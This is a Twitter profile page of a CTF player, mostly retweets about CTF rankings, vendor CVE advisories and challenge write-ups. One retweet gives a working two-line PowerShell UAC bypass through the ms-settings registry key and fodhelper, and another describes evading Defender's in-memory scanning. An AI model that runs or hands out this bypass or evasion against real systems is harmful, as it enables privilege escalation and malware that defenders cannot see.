makelarisjr

79 posts

makelarisjr

makelarisjr

@makelarisjr

SRE @hackthebox_eu | CTF Player @0tolerance_ctf

Greece Katılım Kasım 2015
414 Takip Edilen135 Takipçiler
makelarisjr retweetledi
Zer0Tolerance
Zer0Tolerance@0tolerance_ctf·
We've been busy this weekend! Scoring 5th place on 2 CTFs back to back. The top teams were just one challenge solve apart from each other. Thanks to both @HackPackCTF and @SecuriNets for the fun challenges! See you at the finals.🏴🏴
Zer0Tolerance tweet mediaZer0Tolerance tweet media
English
1
4
16
0
makelarisjr retweetledi
PT SWARM
PT SWARM@ptswarm·
VMware fixed an Unauth RCE in vRealize Business for Cloud (CVE-2021-21984) found by our researcher Egor Dimitrenko. Advisory: vmware.com/security/advis…
PT SWARM tweet media
English
1
54
147
0
makelarisjr retweetledi
Greunion ⚑
Greunion ⚑@greunion_ctf·
New year, new people, new pwning power. 1st 🥇place for our team at #wpictf! Congrats to all the teams, it was a tight race!
Greunion ⚑ tweet media
English
0
5
20
0
makelarisjr retweetledi
Matt Johnson
Matt Johnson@breakfix·
Check out my latest blog post detailing the "Airstrike Attack" allowing for FDE bypass and EoP on domain joined Windows workstations (CVE 2021-28316) shenaniganslabs.io/2021/04/13/Air…
English
11
210
428
0
makelarisjr retweetledi
؜
؜@xxByte·
UAC bypass in 2 lines: ``` New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force ``` cmd -> fodhelper PoC||GTFO
؜ tweet media
English
22
642
1.8K
0
makelarisjr retweetledi
PT SWARM
PT SWARM@ptswarm·
VMware fixed CVE-2021-21975 and CVE-2021-21983, which when chained together lead to an unauth RCE in vRealize Operations. The vulnerabilities were found by our researcher Egor Dimitrenko. Advisory: vmware.com/security/advis…
PT SWARM tweet media
English
2
96
236
0
makelarisjr retweetledi
PT SWARM
PT SWARM@ptswarm·
Rocket.Chat fixed a persistent XSS found by our researcher Igor Sak-Sakovskiy. The vulnerability was triggered by sending a text message, resulting in an arbitrary file read or RCE on the recipient's desktop system. hackerone.com/reports/1014459
PT SWARM tweet media
English
1
28
88
0
makelarisjr retweetledi
deltaclock
deltaclock@deltaclock·
I made a writeup for the Securinets CTF 2021 challenge Mixed since we were the only team that solved it intendedly. Not a crazy challenge but had some cool stuff in there. deltaclock.gitbook.io/ctf-writeups/s…
English
0
9
19
0
makelarisjr retweetledi
S3cur3Th1sSh1t
S3cur3Th1sSh1t@ShitSecure·
Defender in memory scan - Hasta la vista, baby! 🥳 DInvoke Syscalls to avoid hooking + Sleeps for the DLL imports. Both trigger a scan, so doing only one won´t help. Only needs an amsi.dll patch bypass before. gist.github.com/S3cur3Th1sSh1t… Let´s see how long this will last 😬
S3cur3Th1sSh1t tweet mediaS3cur3Th1sSh1t tweet mediaS3cur3Th1sSh1t tweet media
English
7
106
288
0
makelarisjr retweetledi
ϻг_ϻε
ϻг_ϻε@steventseeley·
CVE-2021-21972 on Windows deployments is SYSTEM and on Linux deployments it's only uid 1016. I got you fam.
ϻг_ϻε tweet media
English
8
48
275
0
makelarisjr retweetledi
PT SWARM
PT SWARM@ptswarm·
Since the PoC for the VMware vCenter RCE (CVE-2021-21972) is now readily available, we're publishing our article covering all of the technical details. Read the article: swarm.ptsecurity.com/unauth-rce-vmw…
English
6
410
746
0
makelarisjr retweetledi
makelaris
makelaris@makelariss·
I just came across a writeup for a task I made with @makelarisjr for HTB x UNI CTF. The challenge consists of phar deserialization to RCE using an image polyglot of a POP chain that affects Laravel. The theme is a reference to Mr Robot's Midland City. sourque.dev/writeups/htbq2…
makelaris tweet media
English
0
4
19
0
makelarisjr retweetledi
makelaris
makelaris@makelariss·
@NRockhouse wrote a nice writeup for a challenge I made with @makelarisjr for the HTB x UNI CTF. The challenge consists of jku claim misuse due to URL parsing inconsistencies and session fixation via response splitting resulting in CSP policy injection. blog.rockhouse.dev/2021/01/10/hac…
makelaris tweet media
English
1
3
11
0
makelarisjr retweetledi
Hack The Box
Hack The Box@hackthebox_eu·
#HTB UNI #CTF 2020 - Quals Round is over! 🚩 Congrats to all participants, 204 Teams & 1,375 Players 👏 The TOP 3 now: 🥇 SIGINT @EdinburghUni 🥈 AptBlackboxTesters @DTUtweet 🥉 UniWA @iceuniwa Next Step? Write-ups! ✍️ Stay tuned for the final results of the TOP 15! #HackTheBox
Hack The Box tweet media
English
0
9
46
0